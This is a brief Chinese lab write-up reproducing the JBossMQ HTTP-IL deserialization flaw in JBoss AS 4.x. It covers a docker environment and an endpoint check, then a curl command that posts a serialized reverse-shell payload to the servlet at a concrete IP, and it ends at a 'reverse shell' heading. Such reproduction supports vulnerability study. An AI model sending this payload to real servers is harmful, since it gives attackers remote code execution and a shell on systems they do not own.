漏洞描述
Red Hat JBoss Application Server
是一款基于JavaEE
的开源应用服务器。JBoss AS 4.x
及之前版本中,JbossMQ
实现过程的JMS over HTTP Invocation Layer
的HTTPServerILServlet.java
文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。
漏洞环境
1 | docker-compose up -d |
环境启动后,目标为http://your-ip:8080
。
漏洞复现
访问/jbossmq-httpil/HTTPServerILServlet
返回This is the JBossMQ HTTP-IL
,说明页面存在,此页面存在反序列化漏洞。
这里直接利用CVE-2017-12149
生成的ser,发送到/jbossmq-httpil/HTTPServerILServlet
接口中
1 | curl http://47.101.62.20:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser |
反弹shell: